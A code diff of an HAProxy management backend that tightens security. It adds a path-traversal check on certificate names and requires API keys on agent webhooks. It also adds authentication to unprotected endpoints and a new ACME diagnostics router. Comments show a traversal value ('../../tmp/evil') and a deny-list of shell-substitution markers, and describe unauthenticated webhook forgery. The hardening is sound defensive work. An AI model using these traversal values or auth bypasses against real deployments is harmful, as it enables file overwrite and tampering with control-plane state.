@@ -156,6 +219,32 @@ class FrontendConfig(BaseModel):
if v is not None and (not isinstance(v, int) or v < 1):
raise ValueError('SSL certificate ID must be a positive integer')
return v
@validator('ssl_verify', pre=True)
def coerce_ssl_verify_empty_to_none(cls, v):
"""PR-2 (R11.B) + R11-audit-1 (FIX-1): React form Select widgets
clear to '' (empty string) but the strict Literal would reject
that. Coerce the empty string and the legacy sentinels written
by older clients into None so the generator omits the directive.
FIX-1 (R11-audit-1): the pre-fix branch only matched lowercase
canonical values (`'none'`/`'optional'`/`'required'`). External
API clients sometimes send uppercase (`'OPTIONAL'`, `'NONE'`)
which the Literal would then REJECT — even though the lowercase
equivalent is a valid value. The behaviour was inconsistent
with the sister coercer in `models/site_wizard.py::SSLChoice`
(mode='before') which already lowercases canonical values.
Now `frontend.py` matches the same case-insensitive contract.
"""
if v is None:
return None
if isinstance(v, str):
stripped = v.strip().lower()
if stripped in ("", "[]", "{}", "null"):
return None
if stripped in ("none", "optional", "required"):
return stripped
return v
@validator('ssl_certificate_ids', pre=True, always=True)
def validate_ssl_certificate_ids(cls, v, values):
@@ -210,28 +299,56 @@ class FrontendConfig(BaseModel):
return v
# Bulgu #66 (round-22 audit) — align manual FrontendConfig
# numeric bounds with the wizard's `FrontendStep` bounds. Pre-
# fix the manual model used much tighter ranges than what the
# wizard accepted:
#
# field manual (pre-fix) wizard
# timeout_client 1000 .. 3_600_000 100 .. 86_400_000
# timeout_http_request 1000 .. 300_000 100 .. 86_400_000
# maxconn 1 .. 100_000 1 .. 1_000_000
# rate_limit 1 .. 10_000 0 .. 1_000_000
#
# A frontend that the wizard accepted at create time could
# therefore 422 on the very first PUT from the FrontendManagement
# UI — the model rejected the legacy value before the
# route-level grandfathering (#62) could even run. Same Bulgu
# #62 pattern: operator changes port → blocked on an unrelated
# field they didn't author. The new ranges mirror the wizard
# exactly so the two entry points agree byte-for-byte. Each
# field already passes through HAProxy's own `haproxy -c`
# check at apply time as the ultimate ceiling.
@validator('timeout_client')
def validate_timeout_client(cls, v):
if v is not None and (v < 1000 or v > 3600000): # 1s to 1h in ms
raise ValueError('Client timeout must be between 1000ms (1s) and 3600000ms (1h)')
if v is not None and (v < 100 or v > 86_400_000):
raise ValueError(
'Client timeout must be between 100ms and 86400000ms (24h)'
)
return v
@validator('timeout_http_request')
def validate_timeout_http_request(cls, v):
if v is not None and (v < 1000 or v > 300000): # 1s to 5min in ms
raise ValueError('HTTP request timeout must be between 1000ms (1s) and 300000ms (5min)')
if v is not None and (v < 100 or v > 86_400_000):
raise ValueError(
'HTTP request timeout must be between 100ms and 86400000ms (24h)'
)
return v
@validator('rate_limit')
def validate_rate_limit(cls, v):
if v is not None and (v < 1 or v > 10000):
raise ValueError('Rate limit must be between 1 and 10000 requests')
if v is not None and (v < 0 or v > 1_000_000):
raise ValueError(
'Rate limit must be between 0 and 1000000 requests (0 = disabled)'
)
return v
@validator('maxconn')
def validate_maxconn(cls, v):
if v is not None and (v < 1 or v > 100000):
raise ValueError('Max connections must be between 1 and 100000')
if v is not None and (v < 1 or v > 1_000_000):
raise ValueError(
'Max connections must be between 1 and 1000000'
)
return v
@validator('ssl_min_ver', 'ssl_max_ver')
@@ -244,77 +361,215 @@ class FrontendConfig(BaseModel):
@validator('ssl_alpn')
def validate_alpn(cls, v):
if v is not None and v.strip():
# ALPN protocols are comma-separated
protocols = [p.strip() for p in v.split(',')]
valid_protocols = ['h2', 'http/1.1', 'http/1.0', 'h2c', 'spdy/3', 'spdy/2', 'spdy/1']
for proto in protocols:
if proto and proto not in valid_protocols:
# Provide helpful error message for common mistakes
if proto.lower() in ['http/2', 'http2', 'http-2']:
raise ValueError(
f'Invalid ALPN protocol: {proto}. '
f'For HTTP/2, use "h2" (not "http/2"). '
f'Valid protocols: {", ".join(valid_protocols)}'
)
else:
raise ValueError(
f'Invalid ALPN protocol: {proto}. '
f'Valid protocols: {", ".join(valid_protocols)}'
)
# Bulgu #65 (round-22 audit) — pre-fix this validator
# rejected anything not in a fixed whitelist of HTTP / SPDY
# tokens. RFC 7301 explicitly states ALPN identifiers are
# 1-255 octet opaque tokens; HAProxy passes them through
# to OpenSSL without enforcing a list. Operators with
# legacy frontends carrying non-HTTP ALPN values such as
# `postgres`, `imap`, `smtp`, `acme-tls/1`, or vendor-
# specific identifiers were locked out of editing any
# unrelated field (port / max conn / default backend) —
# the FrontendManagement UI re-sends the existing
# `ssl_alpn` value verbatim and the model 422-ed the PUT.
#
# The validator now accepts any token matching the
# RFC-7301-compatible character class (printable ASCII
# minus separators, length 1-255). The helpful "use h2
# not http/2" hint is retained because that's a real
# operator typo we want to catch.
if v is None or not v.strip():
return v
protocols = [p.strip() for p in v.split(',')]
token_re = re.compile(r"^[A-Za-z0-9][A-Za-z0-9./_+-]{0,254}$")
common_typos = {'http/2', 'http2', 'http-2'}
for proto in protocols:
if not proto:
continue
if proto.lower() in common_typos:
raise ValueError(
f'Invalid ALPN protocol: {proto}. '
f'For HTTP/2, use "h2" (not "{proto}").'
)
if not token_re.match(proto):
raise ValueError(
f'Invalid ALPN protocol token: "{proto}". '
f'Per RFC 7301 each comma-separated entry '
f'must be 1-255 characters of letters / digits '
f'/ "." / "/" / "_" / "+" / "-" and must start '
f'with a letter or digit.'
)
return v
@validator('ssl_npn')
def validate_npn(cls, v):
if v is not None and v.strip():
# NPN protocols are comma-separated (legacy)
protocols = [p.strip() for p in v.split(',')]
valid_protocols = ['http/1.1', 'http/1.0', 'spdy/3', 'spdy/2', 'spdy/1']
for proto in protocols:
if proto and proto not in valid_protocols:
raise ValueError(f'Invalid NPN protocol: {proto}. Valid protocols: {", ".join(valid_protocols)}')
# Bulgu #65 (round-22 audit) — same relaxation as ssl_alpn.
# NPN is the deprecated predecessor of ALPN (RFC 7301
# obsoletes it); HAProxy still accepts any opaque token.
if v is None or not v.strip():
return v
protocols = [p.strip() for p in v.split(',')]
token_re = re.compile(r"^[A-Za-z0-9][A-Za-z0-9./_+-]{0,254}$")
for proto in protocols:
if proto and not token_re.match(proto):
raise ValueError(
f'Invalid NPN protocol token: "{proto}". '
f'Use 1-255 characters of letters / digits / '
f'"." / "/" / "_" / "+" / "-" starting with a '
f'letter or digit.'
)
return v
@validator('acl_rules')
def validate_acl_rules(cls, v):
if not v:
return []
validated_rules = []
for rule in v:
rule = rule.strip()
if not rule:
continue
# Basic ACL syntax validation
if not re.match(r'^[a-zA-Z0-9_.-]+\s+', rule):
raise ValueError(f'Invalid ACL rule syntax: "{rule}". Must start with ACL name followed by condition.')
# Check for dangerous patterns
if any(dangerous in rule.lower() for dangerous in ['system', 'exec', 'eval', '$(', '`']):
# Bulgu #64 (round-22 audit) — the previous danger-pattern
# list was `['system', 'exec', 'eval', '$(', '`']` and
# rejected the substring anywhere in the rule. That broke
# legitimate ACL names like `acl is_system hdr(host) -i
# internal.example.com`, `acl my_subsystem path_beg /sub`,
# `acl block_executable path_end .exe`, etc. HAProxy has
# no `system`/`exec`/`eval` directive — those words carry
# no runtime semantics inside a rendered config, so the
# check was over-cautious and a false-positive trap on
# the UPDATE path (legacy rows could not be edited).
# `$(` and backtick stay because they're shell-substitution
# markers that don't appear in any legitimate HAProxy
# directive shape.
if any(dangerous in rule.lower() for dangerous in ['$(', '`']):
raise ValueError(f'ACL rule contains potentially dangerous content: "{rule}"')
# Phase K Phase D follow-up (Bulgu #12 round 3) — reject
# the HAProxy `-f <file>` pattern-file flag here too so the
# manual Frontend API mirrors the wizard's parity rule.
# HAProxy OpenManager does not provision pattern files
# onto the HAProxy node filesystem, so any `-f /path/...`
# reference will fail HAProxy's `-c` parse at apply time
# with "failed to open pattern file". Reject up-front so
# operators get the same actionable error from both the
# manual page and the wizard.
if re.search(r"(^|\s)-f(\s|$)", rule):
raise ValueError(
f'ACL rule "{rule}" uses the HAProxy `-f <file>` '
"pattern-file flag, which is not supported in "
"HAProxy OpenManager: the product does not "
"provision pattern files onto the HAProxy node "
"filesystem, so the reference would fail at "
"reload time. Use inline values instead "
"(e.g. `src 10.0.0.0/24` rather than "
"`src -f /etc/haproxy/admins.lst`)."
)
validated_rules.append(rule)
return validated_rules
@validator('redirect_rules')
def validate_redirect_rules_syntax(cls, v):
if not v:
return []
# Bulgu #62 (round-22 audit) — defensively tolerate dict-shaped
# redirect rules (the wizard's `_build_redirect_rules` stores
# the auto-generated HTTP→HTTPS redirect as
# `{"type": "scheme", "scheme": "https", "code": 301,
# "condition": "…"}`). Pre-fix this loop called `rule.strip()`
# unconditionally and crashed with AttributeError on dicts,
# 422-ing every wizard-created frontend the operator tried to
# edit from the FrontendManagement UI. Now the loop accepts
# both shapes: strings are syntax-validated, dicts are passed
# through (their structure was already validated by the
# wizard's own `_validate_redirect_rules` field validator
# and is round-tripped through HAProxy by the renderer's
# `_format_redirect_rule`).
validated_rules = []
for rule in v:
if isinstance(rule, dict):
validated_rules.append(rule)
continue
if not isinstance(rule, str):
continue
rule = rule.strip()
if not rule:
continue
# Basic redirect syntax validation
valid_redirects = ['location', 'prefix', 'scheme']
if not any(rule.startswith(redirect_type) for redirect_type in valid_redirects):
raise ValueError(f'Invalid redirect rule: "{rule}". Must start with: location, prefix, or scheme.')
# Phase K Phase D follow-up (Bulgu #12 round 3) —
# mirror the wizard's `-f <file>` guard here. The
# `X !X` contradiction check used to live alongside
# this guard, but Bulgu #62 (round-22 audit) moved
# it into the route handler so updates can grandfather
# legacy rules created before the contradiction guard
# landed. See `routers/frontend.py::_collect_routing_rule_contradictions`.
if re.search(r"(^|\s)-f(\s|$)", rule):
raise ValueError(
f'Redirect rule "{rule}" uses the HAProxy `-f <file>` '
"pattern-file flag, which is not supported in "
"HAProxy OpenManager: the product does not provision "
"pattern files onto the HAProxy node filesystem."
)
validated_rules.append(rule)
return validated_rules
return validated_rules
@validator('use_backend_rules')
def validate_use_backend_rules_syntax(cls, v):
"""Phase K Phase D follow-up (Bulgu #12 round 3) — manual
Frontend API parity guard: reject `-f <file>` references
and dangerous shell patterns.
Bulgu #62 (round-22 audit) — the `X !X` contradiction check
previously lived here but moved into the route handler so
the UPDATE path can grandfather legacy rules created before
the contradiction guard landed (e.g. wizard-created frontends
from a pre-Bulgu-#13 build). The handler-level enforcement
keeps POST strict (hard reject) and lets PUT pass through
unchanged grandfathered rules with a soft warning.
"""
if not v:
return []
validated_rules = []
for rule in v:
if not isinstance(rule, str):
continue
rule = rule.strip()
if not rule:
continue
# Bulgu #64 (round-22 audit) — same relaxation as
# `validate_acl_rules`: drop the 'system'/'exec'/'eval'
# substring tripwires (false-positive on legitimate names
# like `is_system`, `subsystem`, `executable`) and keep
# only `$(` and backtick (shell-substitution markers
# that have no legitimate place in a HAProxy directive).
if any(dangerous in rule.lower() for dangerous in ['$(', '`']):
raise ValueError(
f'use_backend rule contains potentially dangerous '
f'content: "{rule}"'
)
if re.search(r"(^|\s)-f(\s|$)", rule):
raise ValueError(
f'use_backend rule "{rule}" uses the HAProxy '
"`-f <file>` pattern-file flag, which is not "
"supported in HAProxy OpenManager: the product "
"does not provision pattern files onto the HAProxy "
"node filesystem."
)
validated_rules.append(rule)
return validated_rules
File diff suppressed because it is too large Load Diff
+65 -1
View File
@@ -20,7 +20,50 @@ class SSLCertificateCreate(BaseModel):
if v not in ['frontend', 'server']:
raise ValueError('usage_type must be either "frontend" or "server"')
return v
@field_validator('name')
@classmethod
def validate_name_no_path_traversal(cls, v):
"""Bulgu #21 (round-11 audit): SSL certificate `name` is interpolated
into the on-disk certificate path:
cert_path = f"/etc/ssl/haproxy/{ssl_cert['name']}.pem"
and emitted into the rendered HAProxy config. The agent then
runs `mv "$temp_cert_file" "$cert_file_path"` as root, which
means a name like '../../tmp/evil' resolves to '/tmp/evil.pem'
and lets an operator with ssl.create permission overwrite
arbitrary `*.pem` files on the agent host. The trailing `.pem`
suffix mitigates common exploit paths (cron.d, profile.d,
authorized_keys) but is defense-only — the right fix is to
constrain `name` at the API boundary. Mirror SSLChoice's
constraints so the wizard and direct API give the same answer.
"""
if v is None:
return v
stripped = v.strip()
if not stripped:
raise ValueError('SSL certificate name must not be empty')
if stripped != v:
raise ValueError('SSL certificate name must not contain leading/trailing whitespace')
if len(stripped) > 200:
raise ValueError('SSL certificate name must be 200 characters or fewer')
import re as _re
if not _re.match(r'^[A-Za-z0-9_.-]+$', stripped):
raise ValueError(
f'SSL certificate name={v!r} contains forbidden characters '
'— only letters, digits, underscore, hyphen, and dot are '
'allowed (the name is used as a filename component under '
'/etc/ssl/haproxy/).'
)
if '..' in stripped:
raise ValueError(f'SSL certificate name={v!r} must not contain ".." (path traversal)')
if stripped.startswith('.'):
raise ValueError(f'SSL certificate name={v!r} must not start with "." (hidden filename)')
if stripped.startswith('-'):
raise ValueError(f'SSL certificate name={v!r} must not start with "-" (CLI flag confusion)')
return stripped
@field_validator('certificate_content')
@classmethod
def validate_certificate(cls, v):
@@ -84,6 +127,27 @@ class SSLCertificateUpdate(BaseModel):
raise ValueError('usage_type must be either "frontend" or "server"')
return v
# Bulgu #63 (round-22 audit) — the path-traversal guard previously
# lived here as a strict Pydantic validator (Bulgu #21, round-11).
# On UPDATE the manual SSL UI re-sends the existing `name` along
# with the field the operator actually edited (usage_type /
# cluster_id / content). If the existing certificate name was
# imported BEFORE Bulgu #21 landed (or by a different upload path)
# and contained a now-rejected character — e.g. legacy uploads
# with `cert (1).pem`, `*.example.com`, `client cert.pem`, or
# `wildcard.example.com` if dot was not yet escaped — every PUT
# would 400 even though the operator was only changing usage
# type or attaching the cert to another cluster. That mirrors
# the Bulgu #62 lockout on frontends.
#
# The guard was moved into `routers/ssl.py::_assert_safe_cert_name`
# and is now invoked by the create + update routes:
# * create: strict — rejects unsafe names outright (Bulgu #21
# contract preserved for fresh inserts).
# * update: skipped if `name` is unchanged from the DB row;
# enforced strictly only when the operator actually renames
# the certificate.
class SSLCertificate(BaseModel):
id: int
name: str
+284
View File
@@ -0,0 +1,284 @@
"""
ACME diagnostics router (Feature A — Issue #13).
Endpoints:
- POST /api/letsencrypt/orders/{order_id}/diagnostics
Run the full pre-flight + post-failure check suite for an order.
- POST /api/letsencrypt/orders/{order_id}/diagnostics/{check_id}/rerun
Re-run a single check (DNS/port80/routing/account/agents).
- GET /api/letsencrypt/orders/{order_id}/events
Return the merged event timeline (acme_order_events + correlated
user_activity_logs).
RBAC: ssl.read for run, ssl.read for events read.
Per-user 5/min rate-limit via user_activity_logs SQL count (M18 / R50).
"""
import json
import logging
from datetime import datetime
from typing import List, Optional
from fastapi import APIRouter, Header, HTTPException
from auth_middleware import check_user_permission, get_current_user_from_token
from database.connection import close_database_connection, get_database_connection
from services.acme_diagnostics import CHECK_IDS, humanize_error_detail, run_checks
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/api/letsencrypt", tags=["Let's Encrypt / ACME"])
_RATE_LIMIT_PER_MIN = 5
async def _enforce_rate_limit(conn, user_id: int, action: str) -> None:
"""Per-user, per-minute COUNT(*) rate limit against user_activity_logs.
Backed by the (user_id, action, created_at DESC) composite index added in
v1.5.0 (M33/R50).
"""
cnt = await conn.fetchval(
"""
SELECT COUNT(*)
FROM user_activity_logs
WHERE user_id = $1
AND action = $2
AND created_at >= NOW() - INTERVAL '60 seconds'
""",
user_id,
action,
)
if cnt is not None and cnt >= _RATE_LIMIT_PER_MIN:
raise HTTPException(
status_code=429,
detail=f"Rate limit exceeded: {action} allowed {_RATE_LIMIT_PER_MIN} requests per minute",
)
async def _load_order(conn, order_id: int) -> dict:
row = await conn.fetchrow(
"""
SELECT id, account_id, status, domains, cluster_ids, error_detail,
post_completion_actions, pending_apply_version_name,
wizard_staged_until, created_by
FROM letsencrypt_orders
WHERE id = $1
""",
order_id,
)
if not row:
raise HTTPException(status_code=404, detail=f"Order {order_id} not found")
return dict(row)
def _parse_jsonb_list(raw, default):
if raw is None:
return default
if isinstance(raw, (list, dict)):
return raw
if isinstance(raw, str):
try:
return json.loads(raw)
except json.JSONDecodeError:
return default
return default
@router.post("/orders/{order_id}/diagnostics")
async def run_diagnostics(order_id: int, authorization: str = Header(None)):
"""Run the full pre-flight + post-failure diagnostic suite."""
current_user = await get_current_user_from_token(authorization)
if not await check_user_permission(current_user["id"], "ssl", "read"):
raise HTTPException(status_code=403, detail="Insufficient permissions: ssl.read required")
conn = await get_database_connection()
try:
await _enforce_rate_limit(conn, current_user["id"], "acme_diagnostics_run")
order = await _load_order(conn, order_id)
domains = _parse_jsonb_list(order["domains"], [])
cluster_ids = _parse_jsonb_list(order["cluster_ids"], [])
results = await run_checks(
conn,
domains=domains,
cluster_ids=cluster_ids,
account_id=order["account_id"],
)
humanized_error = humanize_error_detail(order["error_detail"])
return {
"order_id": order_id,
"status": order["status"],
"checks": results,
"humanized_error": humanized_error,
"generated_at": datetime.utcnow().isoformat() + "Z",
}
finally:
await close_database_connection(conn)
@router.post("/orders/{order_id}/diagnostics/{check_id}/rerun")
async def rerun_diagnostic_check(
order_id: int,
check_id: str,
authorization: str = Header(None),
):
"""Re-run a single check (DNS / port80 / routing / account / agents)."""
current_user = await get_current_user_from_token(authorization)
if not await check_user_permission(current_user["id"], "ssl", "read"):
raise HTTPException(status_code=403, detail="Insufficient permissions: ssl.read required")
if check_id not in CHECK_IDS:
raise HTTPException(
status_code=400,
detail=f"Unknown check_id '{check_id}'. Valid: {', '.join(CHECK_IDS)}",
)
conn = await get_database_connection()
try:
await _enforce_rate_limit(conn, current_user["id"], "acme_diagnostic_check_rerun")
order = await _load_order(conn, order_id)
domains = _parse_jsonb_list(order["domains"], [])
cluster_ids = _parse_jsonb_list(order["cluster_ids"], [])
results = await run_checks(
conn,
domains=domains,
cluster_ids=cluster_ids,
account_id=order["account_id"],
only=[check_id],
)
return {
"order_id": order_id,
"check": results[0] if results else None,
}
finally:
await close_database_connection(conn)
@router.get("/orders/{order_id}/events")
async def get_order_events(
order_id: int,
limit: int = 100,
authorization: str = Header(None),
):
"""Return the merged event timeline for an order:
- acme_order_events rows (typed events)
- correlated user_activity_logs entries (resource='letsencrypt_order' AND
resource_id=order_id) for context.
Sorted by created_at ASC (oldest first) so the timeline reads naturally.
"""
current_user = await get_current_user_from_token(authorization)
if not await check_user_permission(current_user["id"], "ssl", "read"):
raise HTTPException(status_code=403, detail="Insufficient permissions: ssl.read required")
if limit <= 0 or limit > 500:
limit = 100
conn = await get_database_connection()
try:
# Existence check
await _load_order(conn, order_id)
# Detect whether acme_order_events exists (zero-impact for envs that
# have not yet run the v1.5.0 migration). Returns empty event_log when
# not yet present rather than 500-ing.
events_table_exists = await conn.fetchval(
"""
SELECT EXISTS (
SELECT 1 FROM information_schema.tables WHERE table_name = 'acme_order_events'
)
"""
)
events: List[dict] = []
if events_table_exists:
event_rows = await conn.fetch(
"""
SELECT id, event_type, severity, message, details, correlation_id, created_at
FROM acme_order_events
WHERE order_id = $1
ORDER BY created_at ASC, id ASC
LIMIT $2
""",
order_id,
limit,
)
for r in event_rows:
# R18c round 8 (Bulgu A): asyncpg returns JSONB columns as
# raw JSON strings (no codec on the pool). For the FE
# contract the `details` field MUST be either a dict or
# null — otherwise the React renderer ends up trying to
# access `details.foo` on a plain string and silently
# gets undefined.
_det = r["details"]
if isinstance(_det, str):
try:
_det = json.loads(_det)
except Exception:
_det = {}
if not isinstance(_det, (dict, list)):
_det = {} if _det is None else {"raw": str(_det)}
events.append({
"source": "acme_order_event",
"id": r["id"],
"event_type": r["event_type"],
"severity": r["severity"],
"message": r["message"],
"details": _det,
"correlation_id": r["correlation_id"],
"created_at": r["created_at"].isoformat().replace("+00:00", "Z")
if r["created_at"] else None,
})
# User activity rows correlated by resource — schema is permissive
# (`resource_type`/`resource_id` may not always be populated for older
# rows) so this query stays best-effort.
ua_rows = await conn.fetch(
"""
SELECT id, action, resource_type, resource_id, status, details, created_at, user_id
FROM user_activity_logs
WHERE resource_type = 'letsencrypt_order' AND resource_id = $1
ORDER BY created_at ASC, id ASC
LIMIT $2
""",
str(order_id),
limit,
) if await conn.fetchval(
"""
SELECT EXISTS (
SELECT 1 FROM information_schema.columns
WHERE table_name = 'user_activity_logs' AND column_name = 'resource_id'
)
"""
) else []
for r in ua_rows:
events.append({
"source": "user_activity_log",
"id": r["id"],
"event_type": r["action"],
"severity": "info" if (r["status"] or "").lower() in ("success", "ok", "") else "warn",
"message": (r["details"] or "")[:500] if isinstance(r["details"], str) else "",
"details": r["details"] if not isinstance(r["details"], (str, type(None))) else {},
"correlation_id": None,
"created_at": r["created_at"].isoformat().replace("+00:00", "Z")
if r["created_at"] else None,
})
events.sort(key=lambda e: (e["created_at"] or "", e.get("id") or 0))
return {
"order_id": order_id,
"events": events,
"count": len(events),
}
finally:
await close_database_connection(conn)
+56 -21
View File
@@ -489,9 +489,19 @@ async def generate_install_script(req_data: AgentScriptRequest, request: Request
# Use the specific cluster_id sent from frontend instead of searching by pool_id
cluster_id = req_data.cluster_id
# Validate that the cluster exists and belongs to the specified pool
conn = await get_database_connection()
# Bulgu #82 (round-22 audit) — pre-fix any operator with
# `agents.create` permission could generate an install
# script for ANY cluster, regardless of pool/cluster
# scope. Skip the access check during agent
# auto-upgrade (no `current_user`; agent uses its own
# API key and already proved it owns this cluster's
# config-apply pipeline).
if current_user and cluster_id:
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# CRITICAL: Check if this is an agent upgrade FIRST
# Skip strict validation for upgrades - agent may have old/fallback config
@@ -927,13 +937,28 @@ async def agent_heartbeat(agent_id: int, heartbeat_data: AgentHeartbeat):
async def agent_config_applied_notification(agent_name: str, notification_data: dict, x_api_key: Optional[str] = Header(None)):
"""Receive instant notification when agent applies configuration - for real-time UI sync"""
try:
# Validate agent API key for security
# Bulgu #75 (round-22 audit) — pre-fix the guard read:
#
# if x_api_key and not agent_auth:
# raise HTTPException(401, "Invalid API key")
#
# which accepted requests with NO `x_api_key` header at
# all (the `and` short-circuits). An unauthenticated
# attacker could therefore POST fabricated
# `config-applied`, `config-validation-failed`,
# `config-sync` and `upgrade-complete` notifications,
# poisoning the control-plane's view of agent state and —
# for `config-sync` — overwriting entity rows in the DB
# to match attacker-supplied HAProxy fragments. The new
# guard requires a present-AND-valid agent API key.
from auth_middleware import validate_agent_api_key
agent_auth = await validate_agent_api_key(x_api_key)
if x_api_key and not agent_auth:
logger.warning(f"Invalid API key provided by agent '{agent_name}' for config-applied")
raise HTTPException(status_code=401, detail="Invalid API key")
if not agent_auth:
logger.warning(
f"Rejected config-applied call for agent {agent_name!r}: "
f"missing or invalid x-api-key"
)
raise HTTPException(status_code=401, detail="Invalid or missing API key")
# GLOBAL TOKEN: Token can be used by multiple agents across different pools/clusters
conn = await get_database_connection()
@@ -1018,13 +1043,15 @@ async def agent_config_applied_notification(agent_name: str, notification_data:
async def agent_config_validation_failed(agent_name: str, notification_data: dict, x_api_key: Optional[str] = Header(None)):
"""Receive notification when agent's HAProxy config validation fails - for UI error display"""
try:
# Validate agent API key for security
# Bulgu #75 (round-22 audit) — see config-applied above.
from auth_middleware import validate_agent_api_key
agent_auth = await validate_agent_api_key(x_api_key)
if x_api_key and not agent_auth:
logger.warning(f"Invalid API key provided by agent '{agent_name}' for validation-failed")
raise HTTPException(status_code=401, detail="Invalid API key")
if not agent_auth:
logger.warning(
f"Rejected validation-failed call for agent {agent_name!r}: "
f"missing or invalid x-api-key"
)
raise HTTPException(status_code=401, detail="Invalid or missing API key")
# GLOBAL TOKEN: Token can be used by multiple agents across different pools/clusters
conn = await get_database_connection()
@@ -1111,13 +1138,19 @@ async def agent_config_validation_failed(agent_name: str, notification_data: dic
async def agent_config_sync(agent_name: str, sync_data: dict, x_api_key: Optional[str] = Header(None)):
"""Receive agent's current config content and sync database entities accordingly"""
try:
# Validate agent API key for security
# Bulgu #75 (round-22 audit) — see config-applied above.
# config-sync is the highest-impact agent webhook: it
# mutates the entity rows in the DB based on the agent's
# reported HAProxy fragments. Accepting no-API-key
# requests here let an attacker rewrite arbitrary rows.
from auth_middleware import validate_agent_api_key
agent_auth = await validate_agent_api_key(x_api_key)
if x_api_key and not agent_auth:
logger.warning(f"Invalid API key provided by agent '{agent_name}' for config-sync")
raise HTTPException(status_code=401, detail="Invalid API key")
if not agent_auth:
logger.warning(
f"Rejected config-sync call for agent {agent_name!r}: "
f"missing or invalid x-api-key"
)
raise HTTPException(status_code=401, detail="Invalid or missing API key")
# GLOBAL TOKEN: Token can be used by multiple agents across different pools/clusters
conn = await get_database_connection()
@@ -2277,13 +2310,15 @@ async def get_agent_upgrade_status(agent_name: str, x_api_key: Optional[str] = H
async def agent_upgrade_complete(agent_name: str, completion_data: dict, x_api_key: Optional[str] = Header(None)):
"""Receive notification when agent completes or fails upgrade"""
try:
# Validate agent API key for security
# Bulgu #75 (round-22 audit) — see config-applied above.
from auth_middleware import validate_agent_api_key
agent_auth = await validate_agent_api_key(x_api_key)
if x_api_key and not agent_auth:
logger.warning(f"Invalid API key provided by agent '{agent_name}' for upgrade complete")
raise HTTPException(status_code=401, detail="Invalid API key")
if not agent_auth:
logger.warning(
f"Rejected upgrade-complete call for agent {agent_name!r}: "
f"missing or invalid x-api-key"
)
raise HTTPException(status_code=401, detail="Invalid or missing API key")
# GLOBAL TOKEN: Token can be used by multiple agents across different pools/clusters
conn = await get_database_connection()
+339 -52
View File
@@ -1,5 +1,5 @@
from fastapi import APIRouter, HTTPException, Request, Header
from typing import Optional
from typing import Optional, List, Any
import logging
import time
import hashlib
@@ -13,6 +13,73 @@ from services.haproxy_config import generate_haproxy_config_for_cluster
router = APIRouter(prefix="/api/backends", tags=["backends", "servers"])
logger = logging.getLogger(__name__)
# Bulgu #71 / #72 (round-22 audit) — shared helpers for safe
# manipulation of `use_backend` rule strings on backend delete /
# rename cascades. Pre-fix the delete path used a naive
# `backend_name in rule` substring match to decide which rules
# referenced the deleted backend — which collaterally wiped:
#
# * `use_backend api-v2 if is_apiv2` (when deleting "api")
# * `use_backend mobile_api if is_mob` (deleting "api")
# * any acl_rule whose body happened to mention the backend
# name, e.g. `is_api hdr(host) -i api.example.com` (deleting
# "api" would also delete the unrelated ACL definition).
#
# Worse, the rename path didn't update `use_backend_rules` at all,
# so renaming the backend silently broke every routing rule that
# referenced it — the rendered HAProxy config would reference a
# non-existent backend and the agent's `haproxy -c` would either
# reject the reload or send traffic to `default_backend`.
#
# `_extract_use_backend_target` parses the first non-keyword token
# (the backend name) so callers can compare EXACTLY. ACL rules are
# intentionally not touched here — ACLs are reusable predicates,
# not tied to any single backend; the prior coupling was a bug.
def _extract_use_backend_target(rule: Any) -> Optional[str]:
"""Return the backend name targeted by a `use_backend` rule
string, or None for non-string / empty / malformed input.
Handles both stored shapes:
* raw HAProxy form: ``"use_backend api if is_api"``
* FE-stripped form: ``"api if is_api"`` (the FE rule builder
drops the ``use_backend`` keyword on round-trip).
"""
if not isinstance(rule, str):
return None
s = rule.strip()
if not s:
return None
if s.lower().startswith("use_backend "):
s = s[len("use_backend "):].lstrip()
parts = s.split(None, 1)
if not parts:
return None
return parts[0]
def _rename_use_backend_target(rule: Any, old_name: str, new_name: str) -> Any:
"""Return a copy of `rule` with the targeted backend name
rewritten from `old_name` to `new_name`. Rules that don't
target `old_name` are returned UNCHANGED so unrelated rules
are never mutated. Preserves the ``use_backend `` prefix
exactly as it appeared in the input."""
if not isinstance(rule, str):
return rule
s = rule.strip()
if not s:
return rule
prefix = ""
body = s
if s.lower().startswith("use_backend "):
prefix = "use_backend "
body = s[len("use_backend "):].lstrip()
parts = body.split(None, 1)
if not parts or parts[0] != old_name:
return rule
rest = parts[1] if len(parts) > 1 else ""
return f"{prefix}{new_name}{' ' + rest if rest else ''}"
def filter_httpchk_from_options(options: Optional[str]) -> Optional[str]:
"""
Filter out 'option httpchk' directives from options field.
@@ -133,7 +200,11 @@ async def check_server_health(host: str, port: int, timeout: int = 5) -> str:
return "DOWN"
@router.get("", summary="Get All Backends", response_description="List of backends with servers")
async def get_backends(cluster_id: Optional[int] = None, include_inactive: bool = False):
async def get_backends(
cluster_id: Optional[int] = None,
include_inactive: bool = False,
authorization: str = Header(None),
):
"""
# Get All Backends
@@ -202,6 +273,16 @@ async def get_backends(cluster_id: Optional[int] = None, include_inactive: bool
- **first**: First server with available slots
"""
try:
# R18c audit fix (round 6 #2 — KRITIK info leak): require an
# authenticated caller. Pre-fix the endpoint accepted
# anonymous GETs and returned full backend topology
# (server addresses, ports, ca-file paths, weights). With
# wizard-created rows now in the table, any unauthenticated
# reader could enumerate the platform's complete backend
# inventory including upstream IP addresses behind the
# reverse proxy.
from auth_middleware import get_current_user_from_token
await get_current_user_from_token(authorization)
conn = await get_database_connection()
# Get backends with optional cluster filter
@@ -701,16 +782,43 @@ async def create_backend(backend: BackendConfig, authorization: str = Header(Non
raise HTTPException(status_code=500, detail=str(e))
@router.post("/{backend_id}/servers")
async def add_server_to_backend(backend_id: int, server: ServerConfig):
"""Add server to backend"""
async def add_server_to_backend(
backend_id: int,
server: ServerConfig,
authorization: str = Header(None),
):
"""Add server to backend.
Bulgu #76 (round-22 audit) — pre-fix this handler had NO
authentication at all (no `authorization` Header, no call
to `get_current_user_from_token`, no `check_user_permission`).
Anyone who could reach the API surface could POST a server
into any backend in any cluster — a complete write-access
bypass on the data plane. The sibling DELETE / PUT / toggle
handlers all required authentication, so the omission was
almost certainly an oversight rather than intentional.
"""
try:
from auth_middleware import get_current_user_from_token, check_user_permission
current_user = await get_current_user_from_token(authorization)
has_permission = await check_user_permission(current_user["id"], "backends", "update")
if not has_permission:
raise HTTPException(
status_code=403,
detail="Insufficient permissions: backends.update required",
)
conn = await get_database_connection()
# Get backend name and cluster_id
backend = await conn.fetchrow("SELECT name, cluster_id FROM backends WHERE id = $1", backend_id)
if not backend:
